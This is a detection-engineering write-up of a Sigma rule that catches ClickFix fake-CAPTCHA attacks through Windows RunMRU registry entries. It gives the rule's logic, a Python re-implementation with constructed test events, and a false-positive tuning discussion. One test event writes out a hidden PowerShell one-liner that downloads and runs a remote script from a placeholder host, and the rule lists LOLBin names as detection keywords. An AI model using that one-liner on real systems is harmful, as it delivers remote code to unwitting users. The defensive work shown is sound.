LoFP / legitimate applications using runmru with http links

Techniques

Sample rules

Potential ClickFix Execution Pattern - Registry

Description

Detects potential ClickFix malware execution patterns by monitoring registry modifications to RunMRU keys whose value data contains HTTP/HTTPS links. ClickFix is distributed through phishing campaigns and uses techniques such as clipboard hijacking and fake CAPTCHA pages. Through the fake CAPTCHA pages, the adversary tricks users into opening the Run dialog box (Win+R) and pasting the clipboard-hijacked content, typically a one-liner that downloads and executes a remotely hosted malicious file or script. Because Windows records every command entered in the Run dialog under the user's Explorer\RunMRU key, the pasted one-liner becomes visible as a registry value set event.

Detection logic

condition: all of selection_*
selection_details:
  Details|contains:
  - http://
  - https://
selection_registry:
  TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\
selection_susp_pattern:
- Details|contains:
  - account
  - anti-bot
  - botcheck
  - captcha
  - challenge
  - confirmation
  - fraud
  - human
  - identificator
  - identity
  - robot
  - validation
  - verification
  - verify
- Details|contains:
  - '%comspec%'
  - bitsadmin
  - certutil
  - cmd
  - cscript
  - curl
  - mshta
  - powershell
  - pwsh
  - regsvr32
  - rundll32
  - schtasks
  - wget
  - wscript
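The rule's three selections as plain Python, run over constructed Sysmon Event ID 13 (registry value set) records, so that both the intended hit and the false positive this LoFP entry is about can be seen side by side. This is an added example, not code from the LoFP page or the Sigma project; the hostnames, SIDs and the `require_lolbin` tuning switch are assumptions made for illustration.

```python
# Added example: the three selections of the Sigma rule above re-implemented in
# plain Python and run over constructed Sysmon Event ID 13 (registry value set)
# records. Not code from the LoFP page or the Sigma project.

from typing import Dict, List

HTTP_SCHEMES = ("http://", "https://")
RUNMRU_PATH = "\\software\\microsoft\\windows\\currentversion\\explorer\\runmru\\"

# First map of selection_susp_pattern: words typical of the fake CAPTCHA lure.
LURE_WORDS = (
    "account", "anti-bot", "botcheck", "captcha", "challenge", "confirmation",
    "fraud", "human", "identificator", "identity", "robot", "validation",
    "verification", "verify",
)
# Second map: binaries a pasted one-liner uses to fetch and run the payload.
LOLBINS = (
    "%comspec%", "bitsadmin", "certutil", "cmd", "cscript", "curl", "mshta",
    "powershell", "pwsh", "regsvr32", "rundll32", "schtasks", "wget", "wscript",
)


def matches(event: Dict[str, str], require_lolbin: bool = False) -> bool:
    """Evaluate `condition: all of selection_*` for one event.

    Sigma's |contains is a case-insensitive substring test, so both fields are
    lower-cased first. The two maps under selection_susp_pattern form a YAML
    list, which Sigma evaluates as OR. `require_lolbin=True` is a tuning option
    (an assumption of this example, not part of the published rule) that turns
    that OR into AND so a plain URL containing a lure word no longer fires.
    """
    target = event.get("TargetObject", "").lower()
    details = event.get("Details", "").lower()

    selection_registry = RUNMRU_PATH in target
    selection_details = any(s in details for s in HTTP_SCHEMES)
    has_lure = any(w in details for w in LURE_WORDS)
    has_lolbin = any(b in details for b in LOLBINS)
    if require_lolbin:
        selection_susp_pattern = has_lure and has_lolbin
    else:
        selection_susp_pattern = has_lure or has_lolbin

    return selection_registry and selection_details and selection_susp_pattern


# Constructed events in the shape Sysmon emits for Event ID 13. Windows stores
# each Run-dialog entry under RunMRU\<letter> with a trailing "\1"; the SID and
# hostnames are made up for the example.
RUNMRU_KEY = ("HKU\\S-1-5-21-1111-2222-3333-1001\\SOFTWARE\\Microsoft\\Windows"
              "\\CurrentVersion\\Explorer\\RunMRU\\")
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # true positive: ClickFix-style one-liner pasted into Win+R
        "name": "clickfix",
        "TargetObject": RUNMRU_KEY + "a",
        "Details": 'powershell -w h -c "irm https://captcha.example.invalid/verify | iex"\\1',
    },
    {   # the false positive this LoFP entry is about: a user opened an intranet
        # URL from the Run dialog and the path happens to contain lure words
        "name": "intranet-account-page",
        "TargetObject": RUNMRU_KEY + "b",
        "Details": "https://intranet.example.invalid/account/verify-email\\1",
    },
    {   # URL without any lure word or LOLBin: no match
        "name": "intranet-wiki",
        "TargetObject": RUNMRU_KEY + "c",
        "Details": "https://intranet.example.invalid/wiki/home\\1",
    },
    {   # MRUList ordering value written alongside every entry: no URL, no match
        "name": "mrulist",
        "TargetObject": RUNMRU_KEY + "MRUList",
        "Details": "bca",
    },
    {   # same content under a different Explorer key: selection_registry fails
        "name": "typedpaths",
        "TargetObject": ("HKU\\S-1-5-21-1111-2222-3333-1001\\SOFTWARE\\Microsoft\\Windows"
                         "\\CurrentVersion\\Explorer\\TypedPaths\\url1"),
        "Details": "https://captcha.example.invalid/verify",
    },
]


def run_rule(events: List[Dict[str, str]], require_lolbin: bool = False) -> List[str]:
    """Return the names of the events the rule fires on, in input order."""
    return [e["name"] for e in events if matches(e, require_lolbin)]


if __name__ == "__main__":
    print("as published:", run_rule(SAMPLE_EVENTS))
    print("lolbin required:", run_rule(SAMPLE_EVENTS, require_lolbin=True))
```

As published, the rule fires on both the pasted PowerShell one-liner and the intranet URL, because `contains` is a substring test and ordinary URL paths such as `/account/` or `/verify-email` satisfy the first map of `selection_susp_pattern` on their own. Requiring the LOLBin map as well keeps the ClickFix hit and drops the URL, at the cost of missing a lure that is pasted without a recognised binary name; whether that trade-off is acceptable depends on how often users launch web links from the Run dialog in a given environment.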